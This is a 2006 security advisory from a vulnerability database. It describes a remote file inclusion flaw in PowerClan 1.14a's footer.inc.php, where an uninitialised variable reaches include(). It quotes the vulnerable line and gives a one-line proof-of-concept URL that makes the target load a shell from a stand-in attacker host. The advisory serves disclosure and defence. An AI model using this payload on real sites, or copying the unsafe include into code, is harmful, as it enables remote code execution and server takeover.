Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:15466
HistoryDec 21, 2006 - 12:00 a.m.

PowerClan <= 1.14a (footer.inc.php) Remote File Include Vulnerability

2006-12-2100:00:00
vulners.com
7

±------------------------------------------------------------------------------------------

  • PowerClan <= 1.14a (footer.inc.php) Remote File Include Vulnerability
    ±------------------------------------------------------------------------------------------
  • Vendor …: http://www.powerscripts.org/
  • Affected Software .: PowerClan <= 1.14a
  • Download …: http://ftp.powerscripts.org/pc/powerclan114a.zip
  • Class …: Remote File Inclusion
  • Risk …: High (Remote File Execution)
  • Found By …: nuffsaid <nuffsaid[at]newbslove.us>
    ±------------------------------------------------------------------------------------------
  • Details:
  • PowerClan footer.inc.php does not initialize the $settings[footer] variable before using it
  • to include files, assuming register_globals = on, we can initialize the variable in a query
  • string and include a remote file of our choice.
  • Vulnerable Code:
  • footer.inc.php, line(s) 24:
  • -> 24: include($settings[footer]);
  • Proof Of Concept:
  • http://[target]/[path]/footer.inc.php?settings[footer]=http://evilsite.com/shell.php
    ±------------------------------------------------------------------------------------------